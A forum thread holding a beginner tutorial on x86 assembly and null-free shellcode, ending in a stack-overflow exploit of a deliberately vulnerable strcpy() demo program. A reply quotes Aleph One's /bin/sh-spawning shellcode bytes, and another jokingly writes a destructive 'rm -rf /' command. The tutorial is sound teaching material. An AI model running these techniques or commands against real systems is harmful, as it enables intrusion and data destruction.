#1
02-11-2008, 12:14 PM
Twitch
Valued Member

Join Date: Oct 2005
Location: Ireland!
Posts: 475
Tutorial: The path to shellcode

Here's a tutorial I put together to encourage people to get into assembly and exploitation. If there are any errors, please post them here and I'll fix them ASAP.

The path to shellcode
=====================
In this tutorial, I will teach you the basics of assembly needed to
build your own shellcode.
Assembly is quite a misunderstood language, and people often believe that it's harder than it actually is! Here's a little overview of what
assembly really is:
Assembly is programming the machine at the lowest level possible short of writing the 0's and 1's yourself. Each instruction corresponds more or less directly to one machine instruction, and there is no compiler in between, only an assembler that translates your instructions into machine code. It's all about thinking about how you arrange your memory and registers. It's quite easy to do, really.

The goal of this tutorial is to exploit the following program, bug.c. Everything here assumes 32-bit x86 Linux.
Code:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[]){
  char buffer[5];                  /* only 5 bytes of room */
  if(argc<2){
    printf("Usage: %s <text>\n",argv[0]);
    exit(0);
  }
  strcpy(buffer,argv[1]);          /* no length check: this is the bug */
  printf("%s\n",buffer);
  return 0;
}
To compile it, run the following:
$ gcc -g -o bug bug.c
$ ./bug Bob.
Bob.
$

This will compile and test the program. What makes this program exploitable is the call to strcpy(): it does not check whether the source string fits in the destination. In this tutorial, we will take advantage of this by building
a big string in argv[1], which strcpy() will copy into the tiny (5 byte) character array, overwriting whatever lies after it on the stack, including the saved return address of main().

In this tutorial we will be using Intel assembly syntax and the nasm assembler. There are other syntaxes, e.g. AT&T (used by the GNU assembler), and any of them can be used for shellcode; which one you learn is down to taste.
The basic syntax for an assembly instruction is the following:
Code:
	instruction operand(, operand)
The second operand is only needed by some instructions (and some, like ret, are normally used with none at all). When there are two, the first is the destination and the second is the source. Now it's time to learn some of the instructions!

Code:
	mov	- Takes two operands. The second is the source, the first is the destination. It copies the value of the source (a register, a constant, or the contents of a memory location) into the destination.
	inc	- Takes one operand and increases its value by one, storing the result back in that same operand.
	dec	- The same as inc, but decreases the operand's value by one.
	push	- A stack instruction. It takes one operand, the source, and 'pushes' its value onto the top of the stack (ESP is decreased by 4 and the value is stored there).
	pop	- Another stack instruction. It 'pops' the value off the top of the stack into its one operand (and increases ESP by 4).
	call	- Calls a function: it pushes the return address (the address of the instruction after the call) onto the stack, then jumps execution to the address supplied as its operand.
	ret	- Returns from a function. It pops the return address off the stack and jumps execution to it.
	xor	- Takes two operands and performs a bitwise exclusive OR of them, storing the result in the first. XORing a register with itself always gives 0.
	int	- This is the instruction that puts all of this together. It stands for interrupt. It takes one operand, the interrupt number, which selects the part of the system to call. In this tutorial we will use 'int 80h', the interrupt that passes control to the Linux kernel so that it performs the system call we have set up in the registers.

Here is an example demonstrating the syntax of assembly.

example.s
Code:
mov eax,4			; move '4' into eax.
inc eax			; increase eax by one, i.e., to 5.
call randomFunction	; call the function randomFunction (not defined here).
push eax			; push eax's value onto the stack.
pop edx			; pop the value off the top of the stack into EDX.
xor eax,edx			; xor eax with edx, storing the result in eax. Both hold the same value, so eax becomes 0.
Assembling this fragment is pointless (randomFunction doesn't exist), but it gets the general layout into your head.
Now, it's time to take our second step into learning assembly, and write a program.

Hello World!
This program, being our first, will follow tradition: it's going to do nothing but print "Hello, world!". So, how do we go about doing this? Well, the Linux kernel provides a table of system calls, each identified by a number, that correspond to kernel functions.
We need to use the number for write() and ask it to write to STDOUT (standard output, i.e., your console window).
The next question is: where do we put that number and its arguments? The answer is the CPU's registers, which have to be filled in before we call the kernel.
The first four are EAX, EBX, ECX, and EDX. These are called the accumulator, base, counter, and data registers. They are used for a wide range of things, but mainly they are temporary variables that are used when executing machine instructions.

The next four are ESP, EBP, ESI, and EDI. They are also general purpose registers, but are sometimes called pointers and indexes. They are the Stack Pointer, Base Pointer, Source Index, and Destination Index, respectively. The first two are referred to as pointers because they hold 32-bit memory addresses: ESP points to the top of the stack, and EBP to the base of the current function's stack frame.
The last two are also technically pointers; they point to the source and destination when data needs to be read from or written to memory.
Finally, there is the EIP register, which points to the next instruction the CPU will execute. It is akin to a child pointing at a word as it reads.

In this tutorial, we will only need EAX, EBX, ECX, and EDX, but it helps to understand the others. For a system call, EAX holds the number of the system call we want to use, and EBX, ECX, and EDX hold its first, second, and third arguments.

Now, just before we write our program, we need to look at sections in memory. The ones we will use in the following example are .data and .text: .data stores initialized variables (such as our string), and .text holds the executable code.
And now, some assembly!


hello.s
Code:
section .data					; the .data section holds our variables.
	msg db "Hello, world!", 0ah		; our string plus a newline (0ah), stored at the label 'msg'.

section .text					; now in the text section, which holds the code.
	global _start				; export _start so the linker can use it as the ELF entry point.

_start:						; the label where execution begins; ld looks for _start by default.

; SYSCALL 4: write(int fd, const void *buffer, size_t count);
	mov eax,4				; syscall number 4 is write, which we use to write to STDOUT.
	mov ebx,1				; put 1 into EBX: the file descriptor for STDOUT.
	mov ecx,msg				; put the address of 'msg' into ECX.
	mov edx,14				; put the length of the string plus the newline (13 + 1) into EDX.
	int 80h					; call the kernel to run the above!

; SYSCALL 1: exit(0)
	mov eax,1				; put exit's syscall number into EAX.
	mov ebx,0				; exit status 0.
	int 80h
And that's it! It looks a little daunting at first, but it's all very structured and simple, and that's what I really like about assembly. Now, we will assemble and link our code!

twitch@home:~ $ nasm -f elf hello.s
twitch@home:~ $ ld hello.o
twitch@home:~ $ ./a.out
Hello, world!
twitch@home:~ $

So, our program worked. I'd recommend stripping all the comments from the code above and looking at it again; it's a lot cleaner.

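Unfortunately, our code will not work as shellcode.
The problems are as follows:
- Shellcode is injected into the target program as a single string of raw bytes, so it has no .data section of its own and cannot refer to msg by a fixed address; it has to locate its own data at run time.
- It also cannot contain null bytes! strcpy() stops copying at the first 0x00, so everything after it would be lost.
To check for null bytes, we assemble the program in a different way: without -f elf, nasm outputs a flat binary containing only the raw machine code.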

==========
twitch@home:~ $ nasm hello.s
twitch@home:~ $ hexdump -C hello | grep --color=auto 00
[ OUTPUT TRIMMED ]
==========

This will show us a lot of null bytes within the code (grep also matches the zeros in hexdump's offset column, so look at the byte columns). We will have to
remove these, but first let's rewrite our code in a shellcode-suitable form.

hello2.s
Code:
BITS 32

call mark_below

db "Hello, World!",0x0a,0x0d

mark_below:
; ssize_t write(int fd, const void *buf, size_t count);
pop ecx	 					;pop the return address (the string pointer) into ecx
mov eax,4						; 4 is the syscall for write.
mov ebx,1	; STDOUT
mov edx,15						; length of string
int 80h						; do the system call

; void _exit(int status)
mov eax,1						; 1 is exit's system call number
mov ebx,0						; return 0;
int 80h						; do the system call
Now, run the following to assemble and check our code.

$ nasm hello2.s
$ hexdump -C hello2 | grep --color=auto 00

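There are still plenty of null bytes in this code: it can be tested, but it will not work as shellcode. In the output from hexdump, you will see 00 bytes right at the start. Disassembling it (with gdb, or with ndisasm -b 32 hello2) shows that the first three belong to our call: it is encoded as e8 followed by the 4-byte offset 0f 00 00 00. The mov instructions with 32-bit constants, such as mov eax,4 (b8 04 00 00 00), add more. We need to sort all of that out. Here is our modified code.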

hello3.s
Code:
BITS 32

jmp short one					; jump to 'one', which will call 'two'.

two: 
; ssize_t write(int fd, const void *buf, size_t count);
pop ecx						; pop the string pointer (pushed by 'call two') from the stack
xor eax,eax						; clear eax so the mov below leaves exactly 4 in it
mov al,4						; put 4 into AL (syscall 4 = write)
xor ebx,ebx						; XORing ebx with itself gives 0.
inc ebx						; increase ebx by one (1 = STDOUT)
xor edx,edx						; zero out edx
mov dl,15						; put 15 (the string length) into edx
int 80h						; call the kernel

xor eax,eax						; clear write()'s return value from eax
mov al,1						; put 1 into AL for exit
dec ebx						; decrease ebx to 0 (return code)
int 80h						; call the kernel.

one:	
call two						; push the string's address, then jump back to 'two'
db "Hello, world!", 0x0a, 0x0d
This is shellcode that can actually be used! Assemble it and check it to be
sure:

$ nasm hello3.s
$ hexdump -C hello3 | grep --color=auto 00

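Look! No NULL bytes! Excellent, this will do very nicely. But why did it work? Our shellcode is now quite different from before, but it should be readable to you, since it incorporates most of the instructions from the initial example. The jmp short instruction encodes its target as a one-byte offset, and because call two now jumps backwards, its 32-bit offset is negative, so its upper bytes are ff instead of 00. Zeros are produced with xor reg,reg instead of mov reg,0, and small values are loaded into 8-bit registers.
The only thing that ought to be confusing you is the 'mov al,4' line. What is AL? Well, the x86 processors before the 80386 only had 16-bit registers. That meant there was AX as the whole accumulator register, with AL as its lower 8 bits and AH as its higher 8 bits.
With 32-bit processors, we have EAX, which extends AX to 32 bits, and AX, AH, and AL can still be used to access its lower parts. The REASON for using AL is that it is big enough to hold the integer 4: mov eax,4 stores the 4 as a full 32-bit constant (b8 04 00 00 00, three null bytes), while mov al,4 stores it in a single byte (b0 04). Because mov al,4 only changes the lowest byte, the rest of EAX must already be zero; clearing EAX first with xor eax,eax guarantees that.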

Now, it's time to exploit our program!

Running the exploit
Now that we have our shellcode sorted out, we need to find somewhere to
hold it. Our buffer is only 5 bytes, far too small for the shellcode, so we will use a handy trick: environment
variables.
An environment variable is copied onto the stack of the target program when it starts, so we can put the shellcode in one and then
overflow the buffer with repeated copies of that variable's address. One of those copies overwrites the saved return address, so when main() returns, execution jumps into our shellcode. Here is a program that will tell us where an environment variable will be in memory:
getenvaddr.c
Code:
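#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]){
  char *ptr;
  if(argc < 3){
    printf("Usage: %s <environment variable> <target program>\n",argv[0]);
    exit(0);
  }
  ptr = getenv(argv[1]);          /* address of the variable in *this* process */
  if(ptr == NULL){
    printf("%s is not set\n",argv[1]);
    exit(1);
  }
  /* The program name is stored on the stack near the environment, so the
     variable shifts when the target's name is shorter or longer than ours. */
  ptr += ((long)strlen(argv[0]) - (long)strlen(argv[2]))*2;
  printf("%s will be at %p\n",argv[1],(void *)ptr);
  return 0;
}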
We will now compile the above program, and then load the shellcode into an environment variable. Then we will find its memory address, and use perl to print
that address out 100 times. Note that the bytes are written in reverse order, because x86 is little-endian: 0xbfffff0c becomes \x0c\xff\xff\xbf.

$ gcc -o getenvaddr getenvaddr.c
$ nasm hello3.s
$ export SHELLCODE=`cat hello3`
$ ./getenvaddr SHELLCODE ./bug
SHELLCODE will be at 0xbfffff0c
$ ./bug `perl -e 'print "\x0c\xff\xff\xbf"x100;'`
Hello, world!
$
__________________
Twitch`
#2
02-11-2008, 01:38 PM
s25
Administrator
Trusted Member

Join Date: Dec 2005
Posts: 609
Re: Tutorial: The path to shellcode

Very good! Could you define shellcode? I always thought of it as something like

#!/bin/bash
rm -rf /

or some such thing!
__________________
New Public Keys:
http://a0tu.com/content/yep-just-gen...-some-new-keys

#3
02-11-2008, 04:37 PM
Twitch
Valued Member

Join Date: Oct 2005
Location: Ireland!
Posts: 475
Re: Tutorial: The path to shellcode

Yeah, no bother!
Shellcode is a small piece of self-contained machine code, usually written out as hex bytes. It doesn't depend on any particular file or process in the OS: it runs without linking libraries or including other files. It's typically used as the payload when exploiting a program. It got the name because, when exploiting a vulnerability, the purpose of the code was usually to spawn a shell, so "shellcode" stuck as the name.

Here's an example from Aleph One's "Smashing the Stack for Fun and Profit" (Phrack 49):
Code:
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

When you assemble the shellcode (or compile C code), it is turned into machine code: raw bytes that the CPU executes, which we usually write in hex. For example,
(1) mov eax,4 is assembled into "b8 04 00 00 00"
(2) mov al,4 is assembled into "b0 04"

When you put those bytes into a C string or a perl print statement, though, most of them can't be typed as plain characters, so you use the \x escape, which tells the compiler (or perl) to insert the byte with that hexadecimal value. So, mov al,4 is assembled into "b0 04", and when we write it as shellcode, it's "\xb0\x04".
__________________
Twitch`
All times are GMT +1.


Copyright a0tu.com